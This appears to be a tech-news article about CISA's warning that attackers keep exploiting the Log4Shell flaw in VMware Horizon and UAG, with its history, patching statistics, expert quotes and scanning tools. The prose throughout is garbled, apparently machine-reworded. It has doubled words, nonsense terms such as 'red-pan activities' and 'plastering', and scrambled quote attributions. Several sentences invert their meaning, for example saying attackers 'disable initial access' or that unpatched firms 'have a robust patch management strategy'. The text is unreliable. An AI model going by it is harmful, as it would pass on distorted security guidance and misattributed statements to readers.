We are excited to bring Transform 2022 back in person July 19th and virtually July 20th – 28th. Join AI and data leaders for informative talks and exciting networking opportunities. Register today!
Last week, the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning informing organizations that malicious threat actors continue to exploit the zero-day Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) to disable initial access to target systems obtained without the necessary spots.
One of the most worrying elements of the report was that CISA recommended all organizations with affected systems that did not deploy patches to compromise and launch threat hunting activities.
Above all, the notice emphasizes that businesses that have not fixed Log4Shell are still at risk, and should at least deploy available patches to their systems if they do not take steps to fix a hack.
A look at the history of Log4Shell
Alibaba’s cloud security team first discovered and reported the Log4Shell vulnerability to Apache on November 24 last year.
The researchers initially noticed that attackers used an exploit in Apache Log4j 2, an open source library that records bugs and events within Java applications, to remotely execute malicious malicious code to servers and clients using Minecraft.
While Apache resolved the vulnerability on December 9, Log4Shell has already gained a reputation as a serious zero-day vulnerability, with commenters warning that it “will wreak havoc over the Internet in the coming years,” with an estimated 3 billion devices that can be exploited.
As publicity on the vulnerability increased, threat actors began targeting businesses around the world, with Microsoft finding an increase in techniques, including mass scanning, coin mining, remote shell settlement, and red-pan activities.
Since then, the exploitation has reduced confidence in third-party cloud software to the point where 95% of IT leaders report that Log4Shell was a major wake-up call for cloud security and 87% report that they now feel less confident about their cloud security than they did before the incident has.
Is Log4Shell still a threat today?
Although it has been months since Log4Shell was first discovered and many organizations have deployed the necessary vulnerabilities to protect their systems, most have not. In fact, in April this year, a Rezilion report found that nearly 60% of the affected Log4Shell software packages were not repaired.
CISA’s recent warning highlights that failure to patch these systems can be costly oversight, given that threat actors are still actively seeking unprocessed systems to exploit.
The only way to reduce these zero-day threats is for businesses to implement an organized repair plan, to ensure that any servers that look at the Internet are repaired and protected.
“Patching is a critical part of any organization’s security plan, and devices that are connected to the Internet while not being repaired, especially against a known and exploited vulnerability, pose a serious risk to the organizations and their customers,” he said. said safety awareness advocate at KnowBe4. Erich Kron.
“While plastering can be a challenge and even pose a real risk of an outage if there are problems, any organizations that have Internet-enabled devices should have a system in place, and testing to significantly reduce the risk,” he said. Kron said.
The security implications of the failure to repair log4j
At this point in the vulnerability’s life cycle, failure to fix exposed systems is a serious flaw that indicates that an organization has significant gaps in its existing security strategy.
“Repairs for log4j versions that are vulnerable to Log4Shell have been available since December. This includes patches for VMware products, ”said Tim Mackey, chief security strategist at Synopsys Cybersecurity Research Center (CyRC).
“Unfortunately, organizations that have not yet fixed log4j or VMware Horizon have a robust patch management strategy, whether it is a commercial or open source strategy, or have cases of shadow deployments,” Mackey said.
Mackey stresses that while using media outreach to encourage organizations to repair new vulnerabilities can be effective, it is not a substitute for proactive monitoring for new exploits.
A look at the solutions that Log4Shell addresses
Although easier said than done to fix vulnerabilities in complex modern networking environments, there are a growing number of patch management solutions that organizations can use to push patches remotely and efficiently to multiple devices.
Many organizations are already using patch management solutions to keep their devices up to date, with researchers expecting the global patch management market to grow to a value of $ 652 million by 2022 to reach a valuation of $ 1084 million by 2027.
To address the Log4Shell vulnerability on a finer level, companies can use vulnerability scanning tools such as PortSwigger BurpSuite Pro, Nmap, and TrendMicro’s Log4J Vulnerability Tester to identify exposed files so they can take action to recover them.
It is also noteworthy that prominent technology vendors such as Microsoft and Google have deployed their own solutions to help businesses identify and mitigate Log4j.
For example, Microsoft has expanded Microsoft Defender to scan devices for log4j files for vulnerability, and Google Cloud provides Cloud Logging to enable businesses to question logs for attempts to exploit log4j 2 and issue alerts to notify them set when exploitation messages are written to logs.
By combining patch management solutions with proactive vulnerability scanning, organizations can consistently identify compromised infrastructure and exploits such as log4j before an attacker has a chance to exploit them.
VentureBeat’s mission is to be a digital town square for technical decision makers to acquire knowledge about transforming enterprise technology and conduct transactions. Learn more about membership.